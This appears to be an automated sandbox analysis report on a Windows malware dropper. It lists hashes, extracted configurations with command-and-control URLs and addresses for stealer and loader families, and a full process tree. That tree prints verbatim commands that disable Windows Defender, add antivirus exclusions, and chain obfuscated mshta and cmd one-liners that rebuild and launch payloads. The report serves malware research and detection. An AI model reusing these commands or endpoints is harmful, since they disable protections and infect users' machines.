Analysis
-
max time kernel
14s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
19/11/2021, 18:12
Static task
static1
Behavioral task
behavioral1
Sample
ab0bd8932a92421272b5911e2ebf488b.exe
Resource
win7-en-20211104
General
-
Target
ab0bd8932a92421272b5911e2ebf488b.exe
-
Size
9.7MB
-
MD5
ab0bd8932a92421272b5911e2ebf488b
-
SHA1
8fc75411fae94208b303c30faf3f4ba7385f8e22
-
SHA256
61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791
-
SHA512
587d69b5016732170311cbfd85ca04c5b8127158e839e0155a6c225f3dd4e9a9f8a38b758316d557ceaf1b7c676c86f46250a5d3fd34c33681003cc41f1ddbc9
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
amadey
2.82
185.215.113.45/g4MbvE/index.php
Extracted
vidar
48.3
933
-
profile_id
933
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
redline
media151
91.121.67.60:51630
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2992 2220 rundll32.exe 145 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6504 2220 rundll32.exe 145 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/2144-283-0x0000000000418EFA-mapping.dmp family_redline behavioral2/memory/2144-282-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001abb2-163.dat family_socelars behavioral2/files/0x000400000001abb2-196.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/4636-350-0x0000000000400000-0x00000000004D8000-memory.dmp family_vidar behavioral2/memory/4636-347-0x00000000021D0000-0x00000000022A5000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000400000001aba1-123.dat aspack_v212_v242 behavioral2/files/0x000400000001aba1-124.dat aspack_v212_v242 behavioral2/files/0x000400000001aba2-122.dat aspack_v212_v242 behavioral2/files/0x000400000001aba2-127.dat aspack_v212_v242 behavioral2/files/0x000400000001aba4-128.dat aspack_v212_v242 behavioral2/files/0x000400000001aba4-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
pid Process 3852 setup_installer.exe 4092 setup_install.exe 1464 Mon1348816450.exe 1376 Mon13459b4085.exe 1640 Mon13136643d24e51.exe 1180 Mon13d453d994180b.exe 1672 Mon133b4073df5e3f72.exe 1280 Mon135d1cd0566c227c.exe 2764 Mon13073304e5395.exe 2800 Mon134ab4d3e88a4d3e.exe 3952 Mon13a2838ed1d8384.exe 4416 Mon13be6b39578.exe 4260 Mon13248c3d7ea8c81.exe 4736 Mon13bb1ac8986b773.exe 4996 Mon13470f9aa951f871.exe 5056 Mon13073304e5395.tmp 2340 Mon13d453d994180b.tmp 4756 Mon13470f9aa951f871.exe -
Loads dropped DLL 7 IoCs
pid Process 4092 setup_install.exe 4092 setup_install.exe 4092 setup_install.exe 4092 setup_install.exe 4092 setup_install.exe 4092 setup_install.exe 5056 Mon13073304e5395.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 310 ipinfo.io 14 ip-api.com 43 ipinfo.io 44 ipinfo.io 193 ipinfo.io 309 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4996 set thread context of 4756 4996 Mon13470f9aa951f871.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
pid pid_target Process procid_target 3496 4756 WerFault.exe 95 1520 728 WerFault.exe 118 1128 728 WerFault.exe 118 5300 728 WerFault.exe 118 5828 728 WerFault.exe 118 6080 728 WerFault.exe 118 5324 2260 WerFault.exe 124 504 728 WerFault.exe 118 3756 6124 WerFault.exe 162 1264 2424 WerFault.exe 117 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon134ab4d3e88a4d3e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon134ab4d3e88a4d3e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon134ab4d3e88a4d3e.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3796 schtasks.exe 4296 schtasks.exe 5024 schtasks.exe -
Kills process with taskkill 6 IoCs
pid Process 1376 taskkill.exe 5716 taskkill.exe 6876 taskkill.exe 7084 taskkill.exe 6088 taskkill.exe 2020 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4416 Mon13be6b39578.exe 4416 Mon13be6b39578.exe 4416 Mon13be6b39578.exe 4416 Mon13be6b39578.exe 2740 powershell.exe 4696 RunDll32.exe 2800 Mon134ab4d3e88a4d3e.exe 2800 Mon134ab4d3e88a4d3e.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 1280 Mon135d1cd0566c227c.exe Token: SeCreateTokenPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeAssignPrimaryTokenPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeLockMemoryPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeIncreaseQuotaPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeMachineAccountPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeTcbPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeSecurityPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeTakeOwnershipPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeLoadDriverPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeSystemProfilePrivilege 3952 Mon13a2838ed1d8384.exe Token: SeSystemtimePrivilege 3952 Mon13a2838ed1d8384.exe Token: SeProfSingleProcessPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeIncBasePriorityPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeCreatePagefilePrivilege 3952 Mon13a2838ed1d8384.exe Token: SeCreatePermanentPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeBackupPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeRestorePrivilege 3952 Mon13a2838ed1d8384.exe Token: SeShutdownPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeDebugPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeAuditPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeSystemEnvironmentPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeChangeNotifyPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeRemoteShutdownPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeUndockPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeSyncAgentPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeEnableDelegationPrivilege 3952 Mon13a2838ed1d8384.exe Token: SeManageVolumePrivilege 3952 Mon13a2838ed1d8384.exe Token: SeImpersonatePrivilege 3952 Mon13a2838ed1d8384.exe Token: SeCreateGlobalPrivilege 3952 Mon13a2838ed1d8384.exe Token: 31 3952 Mon13a2838ed1d8384.exe Token: 32 3952 Mon13a2838ed1d8384.exe Token: 33 3952 Mon13a2838ed1d8384.exe Token: 34 3952 Mon13a2838ed1d8384.exe Token: 35 3952 Mon13a2838ed1d8384.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 4696 RunDll32.exe Token: SeDebugPrivilege 1376 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4308 wrote to memory of 3852 4308 ab0bd8932a92421272b5911e2ebf488b.exe 68 PID 4308 wrote to memory of 3852 4308 ab0bd8932a92421272b5911e2ebf488b.exe 68 PID 4308 wrote to memory of 3852 4308 ab0bd8932a92421272b5911e2ebf488b.exe 68 PID 3852 wrote to memory of 4092 3852 setup_installer.exe 69 PID 3852 wrote to memory of 4092 3852 setup_installer.exe 69 PID 3852 wrote to memory of 4092 3852 setup_installer.exe 69 PID 4092 wrote to memory of 4584 4092 setup_install.exe 72 PID 4092 wrote to memory of 4584 4092 setup_install.exe 72 PID 4092 wrote to memory of 4584 4092 setup_install.exe 72 PID 4092 wrote to memory of 4572 4092 setup_install.exe 73 PID 4092 wrote to memory of 4572 4092 setup_install.exe 73 PID 4092 wrote to memory of 4572 4092 setup_install.exe 73 PID 4092 wrote to memory of 4644 4092 setup_install.exe 74 PID 4092 wrote to memory of 4644 4092 setup_install.exe 74 PID 4092 wrote to memory of 4644 4092 setup_install.exe 74 PID 4092 wrote to memory of 3756 4092 setup_install.exe 78 PID 4092 wrote to memory of 3756 4092 setup_install.exe 78 PID 4092 wrote to memory of 3756 4092 setup_install.exe 78 PID 4572 wrote to memory of 4696 4572 cmd.exe 77 PID 4572 wrote to memory of 4696 4572 cmd.exe 77 PID 4572 wrote to memory of 4696 4572 cmd.exe 77 PID 4584 wrote to memory of 2740 4584 cmd.exe 76 PID 4584 wrote to memory of 2740 4584 cmd.exe 76 PID 4584 wrote to memory of 2740 4584 cmd.exe 76 PID 4092 wrote to memory of 4264 4092 setup_install.exe 75 PID 4092 wrote to memory of 4264 4092 setup_install.exe 75 PID 4092 wrote to memory of 4264 4092 setup_install.exe 75 PID 4092 wrote to memory of 540 4092 setup_install.exe 79 PID 4092 wrote to memory of 540 4092 setup_install.exe 79 PID 4092 wrote to memory of 540 4092 setup_install.exe 79 PID 4092 wrote to memory of 764 4092 setup_install.exe 80 PID 4092 wrote to memory of 764 4092 setup_install.exe 80 PID 4092 wrote to memory of 764 4092 setup_install.exe 80 PID 4092 wrote to memory of 876 4092 setup_install.exe 81 PID 4092 wrote to memory of 876 4092 setup_install.exe 81 PID 4092 wrote to memory of 876 4092 setup_install.exe 81 PID 4092 wrote to memory of 440 4092 setup_install.exe 82 PID 4092 wrote to memory of 440 4092 setup_install.exe 82 PID 4092 wrote to memory of 440 4092 setup_install.exe 82 PID 4092 wrote to memory of 884 4092 setup_install.exe 89 PID 4092 wrote to memory of 884 4092 setup_install.exe 89 PID 4092 wrote to memory of 884 4092 setup_install.exe 89 PID 4092 wrote to memory of 1128 4092 setup_install.exe 83 PID 4092 wrote to memory of 1128 4092 setup_install.exe 83 PID 4092 wrote to memory of 1128 4092 setup_install.exe 83 PID 4092 wrote to memory of 1264 4092 setup_install.exe 84 PID 4092 wrote to memory of 1264 4092 setup_install.exe 84 PID 4092 wrote to memory of 1264 4092 setup_install.exe 84 PID 4092 wrote to memory of 1496 4092 setup_install.exe 109 PID 4092 wrote to memory of 1496 4092 setup_install.exe 109 PID 4092 wrote to memory of 1496 4092 setup_install.exe 109 PID 540 wrote to memory of 1464 540 cmd.exe 88 PID 540 wrote to memory of 1464 540 cmd.exe 88 PID 764 wrote to memory of 1376 764 cmd.exe 86 PID 764 wrote to memory of 1376 764 cmd.exe 86 PID 764 wrote to memory of 1376 764 cmd.exe 86 PID 4264 wrote to memory of 1180 4264 cmd.exe 87 PID 4264 wrote to memory of 1180 4264 cmd.exe 87 PID 4264 wrote to memory of 1180 4264 cmd.exe 87 PID 876 wrote to memory of 1640 876 cmd.exe 108 PID 876 wrote to memory of 1640 876 cmd.exe 108 PID 876 wrote to memory of 1640 876 cmd.exe 108 PID 3756 wrote to memory of 1672 3756 cmd.exe 90 PID 3756 wrote to memory of 1672 3756 cmd.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:4696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe4⤵PID:4644
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon135d1cd0566c227c.exeMon135d1cd0566c227c.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1280 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2680
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"7⤵PID:4000
-
C:\Users\Admin\AppData\Roaming\3490427.exe"C:\Users\Admin\AppData\Roaming\3490427.exe"8⤵PID:4604
-
-
C:\Users\Admin\AppData\Roaming\4775316.exe"C:\Users\Admin\AppData\Roaming\4775316.exe"8⤵PID:1936
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:5196
-
-
-
C:\Users\Admin\AppData\Roaming\6971572.exe"C:\Users\Admin\AppData\Roaming\6971572.exe"8⤵PID:2688
-
-
C:\Users\Admin\AppData\Roaming\1961519.exe"C:\Users\Admin\AppData\Roaming\1961519.exe"8⤵PID:3804
-
C:\Users\Admin\AppData\Roaming\1112626.exe"C:\Users\Admin\AppData\Roaming\1112626.exe"9⤵PID:728
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )10⤵PID:6044
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\1112626.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\1112626.exe" ) do taskkill -IM "%~NxL" -F11⤵PID:768
-
C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM12⤵PID:6408
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )13⤵PID:6584
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F14⤵PID:6820
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" Vbscript:CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly &DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ))13⤵PID:4928
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly&DEl /q *&stArT msiexec.exe -Y ..\VYGDVP.ly14⤵PID:6632
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "15⤵PID:1232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"15⤵PID:7056
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y ..\VYGDVP.ly15⤵PID:6176
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "1112626.exe" -F12⤵
- Kills process with taskkill
PID:6876
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\211320.exe"C:\Users\Admin\AppData\Roaming\211320.exe"9⤵PID:3936
-
-
-
C:\Users\Admin\AppData\Roaming\8883359.exe"C:\Users\Admin\AppData\Roaming\8883359.exe"8⤵PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:4680
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵PID:2424
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2424 -s 15328⤵
- Program crash
PID:1264
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 8088⤵
- Program crash
PID:1520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 8408⤵
- Program crash
PID:1128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 8648⤵
- Program crash
PID:5300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 8808⤵
- Program crash
PID:5828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 9648⤵
- Program crash
PID:6080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 8888⤵
- Program crash
PID:504
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"7⤵PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:700
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵PID:4056
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵PID:4232
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:5776
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵PID:5068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵PID:2260
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2260 -s 15088⤵
- Program crash
PID:5324
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:980
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:1748
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵PID:380
-
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵PID:4636
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exeMon13d453d994180b.exe5⤵
- Executes dropped EXE
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp"C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp" /SL5="$7007A,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe"6⤵
- Executes dropped EXE
PID:2340
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exeMon133b4073df5e3f72.exe5⤵
- Executes dropped EXE
PID:1672 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT("WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0, TRUE ) )6⤵PID:4276
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9&iF "" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe") do taskkill /f -im "%~nXZ"7⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL98⤵PID:1120
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT("WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF ""/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9"" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"") do taskkill /f -im ""%~nXZ"" " , 0, TRUE ) )9⤵PID:2944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9&iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"10⤵PID:4292
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript:ClOse( CReatEobJeCt ("wscrIPt.SHElL" ). RuN ( "C:\Windows\system32\cmd.exe /q/r EChO | sEt /P = ""MZ"" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F " ,0 ,TrUe ) )9⤵PID:5284
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "Mon133b4073df5e3f72.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1348816450.exe4⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exeMon1348816450.exe5⤵
- Executes dropped EXE
PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13459b4085.exe4⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exeMon13459b4085.exe5⤵
- Executes dropped EXE
PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe4⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exeMon13136643d24e51.exe5⤵
- Executes dropped EXE
PID:1640 -
C:\Users\Admin\Pictures\Adobe Films\gN6O2dq2WbhTm6fJh8uI6Yim.exe"C:\Users\Admin\Pictures\Adobe Films\gN6O2dq2WbhTm6fJh8uI6Yim.exe"6⤵PID:4404
-
-
C:\Users\Admin\Pictures\Adobe Films\2pxQh0RIhP1_2eIKt4DiswNe.exe"C:\Users\Admin\Pictures\Adobe Films\2pxQh0RIhP1_2eIKt4DiswNe.exe"6⤵PID:5560
-
C:\Users\Admin\Documents\0TgdVaMVlWcbBmGmRMGxJ3IH.exe"C:\Users\Admin\Documents\0TgdVaMVlWcbBmGmRMGxJ3IH.exe"7⤵PID:3804
-
C:\Users\Admin\Pictures\Adobe Films\HlulqWBz8a9zsE6VDUWOipBs.exe"C:\Users\Admin\Pictures\Adobe Films\HlulqWBz8a9zsE6VDUWOipBs.exe"8⤵PID:664
-
-
C:\Users\Admin\Pictures\Adobe Films\62nf1QfZnZBgBmfbNYQtBOHN.exe"C:\Users\Admin\Pictures\Adobe Films\62nf1QfZnZBgBmfbNYQtBOHN.exe"8⤵PID:5268
-
-
C:\Users\Admin\Pictures\Adobe Films\Ha9gXlhGWwGJxfMjgAQhtHFn.exe"C:\Users\Admin\Pictures\Adobe Films\Ha9gXlhGWwGJxfMjgAQhtHFn.exe"8⤵PID:7052
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:2020
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\V3jNMH1ylQbvw88MBTOlnGUc.exe"C:\Users\Admin\Pictures\Adobe Films\V3jNMH1ylQbvw88MBTOlnGUc.exe"8⤵PID:6404
-
